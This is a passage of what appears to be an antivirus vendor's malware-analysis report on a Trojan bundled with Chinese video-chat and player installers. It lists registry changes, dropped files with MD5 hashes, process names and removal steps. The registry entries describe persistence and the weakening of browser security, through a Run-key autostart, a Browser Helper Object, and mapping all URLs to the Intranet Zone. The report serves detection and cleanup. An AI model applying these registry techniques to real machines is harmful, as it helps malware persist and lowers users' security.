[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"UninstallString" = "%Program Files%\Rising\RSD\Setup.exe /UNINSTALL /PRODUCT=RSD"
"Publisher" = "Beijing Rising Information Technology, Inc."
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"ravmonexe" = "gWx0Lv5HQFoFVAYjVhUWQQwq"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"URLInfoAbout" = "http://help.ikaka.com/"
[HKLM\SOFTWARE\rising\RAV]
"DataPath" = "%Documents and Settings%\All Users\Application Data\Rising\RAV"
"Type" = "17"
"InstallPath" = "%Program Files%\Rising\RAV"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Services]
"Rising" = "Admin Test"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"monShowName" = "gWx0Lv5HYFoFGTooQE0aWgxX"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9B EB 5D B8 D3 40 DB 2E 70 4B 40 80 D4 A9 85 4B"
[HKLM\SOFTWARE\rising\RAV]
"(Default)" = "Rising Software Deployment System"
"Version" = "24.00.43.49"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"regtray" = "gWx0Lv5HYFoFbTsMa1I="
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCR\CLSID\{CAA2D3B1-4BB5-4a45-A17A-122773379D99}]
"ProcID" = "{F2565346-E9F9-6648-3030-303030303030}"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayName" = "Rising Software Deployment System"
"DisplayIcon" = "%Program Files%\Rising\RSD\Setup.exe"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"monServerName" = "gWx0Lv5HYEghWB8AXVVr"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}]
"ProcKey" = "RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RSDTRAY" = "%Program Files%\Rising\RSD\popwndexe.exe"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
[HKLM\System\CurrentControlSet\Services]
"Rising"
The process 9158.exe:3012 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\9158web]
"VideoDevice" = "0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DB 30 72 92 DD 80 34 D3 5E 1E C3 95 A9 B4 E1 D7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process popwndexe.exe:760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E1 C4 C3 E0 07 87 56 EA 2D 7C F7 5D 82 1E CE 20"
The process xianfengupdate.exe:660 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Browser]
"ieversion" = "6"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\iexplore\AllowedDomains\*]
"(Default)" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKCR\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}]
"(Default)" = "AccountProtect Class"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DF EE 9E 4D 17 3B 00 D8 11 50 97 5C F2 DD 87 FA"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\iexplore]
"Flags" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"
[HKCR\CLSID\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}\InprocServer32]
"(Default)" = "%Documents and Settings%\All Users\Application Data\tools\bdmanager.dll"
It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{CDD7718A-D29A-4E86-A62D-7A44848A46C1}]
"NoExplorer" = "1"
The Trojan deletes the following registry key(s):
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{DBC80044-A445-435b-BC74-9C25C1C588A9}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{E7E6F031-17CE-4C07-BC86-EABFE594F69C}]
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{18DF081C-E8AD-4283-A596-FA578C2EBDC3}]
The process %original file name%.exe:1736 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 C9 DF 57 1B 7B 63 FA 3B 44 DE 4B 18 5F 10 BA"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCU\Software\Browser]
"ieversion" = "6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
Dropped PE files
MD5 | File path |
---|---|
26c9871fe8541e68df2b412884fdd3e4 | c:\Documents and Settings\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe |
4efba0b5ffd3059d1d76c70b67850138 | c:\Documents and Settings\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe |
09006a81a579d90212ccc2bb62cfecc2 | c:\Documents and Settings\All Users\Application Data\tools\bdmanager.dll |
231af98afa9420da45dbeff33867e39f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll |
91cadaaa24017a099cce1df248e25225 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll |
4f53e6f3881ff3e1ee1cc0dc0561410f | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll |
959ea64598b9a3e494c00e8fa793be7e | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsf4.tmp\System.dll |
012a8879efa6f8dbc3c6ba58a659fefb | c:\Program Files\tools\BaiduP2PService.exe |
a86a90ba120c455ac0e3655f146d5a0f | c:\Program Files\tools\P2PBase.dll |
3b14cae0ea1d045bb5b196017913edb3 | c:\Program Files\tools\P2PStatReport.dll |
894ab861e608eacbac24280ab234368f | c:\Program Files\tools\P2SBase.dll |
83bcf3ad82ce65d2bd0fdd364fe32cb5 | c:\Program Files\tools\sr.exe |
3abd5c47c61a71472f00bd45991a916f | c:\Program Files\tools\tools.exe |
00986c841bcc897b86a2b394a1887295 | c:\Program Files\xfplay\tools.exe |
a5e5b2726680a87868f241264e53be5a | c:\Program Files\xfplay\xianfeng.exe |
c54a6cbbc8cd6c9309cc2b3aa4eba6d4 | c:\Program Files\xfplay\xianfengkunbang.exe |
b2ef6010ddeca9357fae34e1fbe4ee2b | c:\Program Files\xfplay\xianfengupdate.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
9158chat2_ktv088_63.exe:2116
sr.exe:244
9158IE.exe:3116
xianfengkunbang.exe:1324
BaiduP2PService.exe:252
BaiduP2PService.exe:472
RsMgrSvc.exe:1936
regsvr32.exe:2380
regsvr32.exe:2448
regsvr32.exe:2328
regsvr32.exe:2480
9158.exe:3012
popwndexe.exe:760
xianfengupdate.exe:660
%original file name%.exe:1736 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓÆµ\öÃâ€ÃƒËœ 9158¶àÈËÊÓÆµ.lnk (715 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading2.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\loading1.bmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step1.bmp (22192 bytes)
%Documents and Settings%\%current user%\Start Menu\Programs\9158¶àÈËÊÓÆµ\9158¶àÈËÊÓÆµ.lnk (707 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\SkinBtn.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\close.bmp (824 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step2.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\install_step3.bmp (22192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\return.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\finish.bmp (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox2.bmp (3 bytes)
%Documents and Settings%\%current user%\Desktop\9158¶àÈËÊÓÆµ.lnk (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc11.tmp (1012028 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\custom.bmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nss12.tmp\checkbox1.bmp (3 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\install.txt (344 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\nsTools.dll (9608 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr8.tmp (48917 bytes)
%Program Files%\tools\BaiduP2PService.exe (17848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsr9.tmp\System.dll (11 bytes)
%Program Files%\tools\P2PStatReport.dll (12536 bytes)
%Program Files%\tools\P2SBase.dll (18424 bytes)
%Program Files%\tools\P2PBase.dll (17848 bytes)
%Program Files%\tools\sr.exe (5520 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\xui[1].js (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\CA4PMRS9.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\M9YNOH2J\CAURKDUJ.htm (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OZ0N258D\icons[1].gif (7 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\Opendownloadernewxml[1].htm (899 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\Downloaderconfig[1].htm (948 bytes)
%Program Files%\9158ktv\DownLoad\9158chat2_ktv088_63.exe.tmp (121120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\CA8HUBK5.htm (764 bytes)
C:\temp.icon (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\6N8PMZAJ\main[1].ico (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\ONADSPW5\1[1].swf (48341 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (148 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004 (18 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabA.tmp (54 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabE.tmp (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\2BF68F4714092295550497DD56F57004 (408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CabC.tmp (54 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015 (408 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdtp (158659 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe.bdre (1040 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarD.tmp (2712 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdtp (117549 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdre (2840 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\ch_dl_url.exe.bdtp (412553 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarB.tmp (2712 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F (176 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\MM-liao8863.exe.bdre (892 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015 (50 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F (533 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\bdsecushr.dat (3628 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\MetaData\62B5AF9BE9ADC1085C3C56EC07A82BF6 (224 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdtp (568599 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\tasks.dat (2420 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\install1393485.exe.bdre (2124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TarF.tmp (2712 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\ioSpecial.ini (1796 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsf4.tmp\modern-wizard.bmp (26 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.exe.log (367 bytes)
%Program Files%\Rising\RSD\RsMgrSvc.dat (708 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDetector.dll (5257 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\QQPCMgr_Setup.exe (454597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\setup.xml (580 bytes)
%Documents and Settings%\%current user%\Application Data\Tencent\QQPCMgr\Download\version (672 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.dll (9775 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\qmdr\dr.dll (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TencentDownload\~508f0\QQPCDownload.kui (1661 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ui\snin.htm (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\rsmon.db1 (43 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\rsdinfo.dll (601 bytes)
%Program Files%\Rising\RSD\RsMgrsvc.ini (60 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.rstray (293 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\moncom08.dll (443 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\moncomm.dll (1222 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\sysmon.sys (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\label.dat (384 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\datastorage.db (19 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CfgDll.dll (701 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\comx3.dll (673 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\rscfg.dll (53 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravmaindui\rsmain.dll (1353 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rav936\lics936.txt (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rscomm\rscommx2.dll (479 bytes)
%Program Files%\Rising\RSD\XMLS\RSSetup.xml (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RsMgrSvc.exe (1855 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravdefdb\uprsuser.dat (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\kguard.sys (1707 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSCFG\RSCFG.xml (996 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\RSD932\Jpn.lag (37 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\os.xml (685 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\Setup.exe (5441 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\rsxml3w.dll (1848 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVMON\RAVMON.xml (574 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\_rav\_rav.xml (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\rsdk\comx3.dll (709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\monbasedui\monbasedui.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVCONFIG\RAVCONFIG.xml (518 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\RstoreDll.dll (953 bytes)
%Program Files%\Rising\RSD\RSD950\CHT.lag (28 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\selfmon.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\url.ini (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\MSCRT9\atl90.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\userdata.mond (485 bytes)
%Program Files%\RsTest.ini (14 bytes)
%Program Files%\Rising\RSD\Backup\RSD\RSSetup\os.xml (685 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravxp\ravxp.exe (86 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravconfig\ravconfig.xml (518 bytes)
%Program Files%\Rising\RSD\updater.exe (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudnotifier.dll (2752 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\license\12345678.000 (48 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\mscrt9\Microsoft.VC90.ATL.manifest (466 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVDEFDB\uprsmon.dat (45 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSDK\dfw.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\hookbase\rsutils.sys (734 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\CompsVer.inf (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\LogDc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\Setup.exe (8063 bytes)
%Program Files%\Rising\RSD\Backup\RAV\HOOKBASE\rsndisp.sys (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\ravbase\ravbase.xml (4 bytes)
%Program Files%\Rising\RSD\Backup\RAV\CLOUDV3\userdata.mond (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\setup.dll (3859 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\LogAc.bmp (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RsdSfxTmp\cloudv3\cloudv3.xml (1 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVBASE\RavSetup.dll (7433 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RAVXP\RAVXP.xml (404 bytes)
%Program Files%\Rising\RSD\Backup\RAV\RSMONDEF\bacore.dll (2321 bytes)
%Program Files%\Rising\RSD\setup.dat (601 bytes)
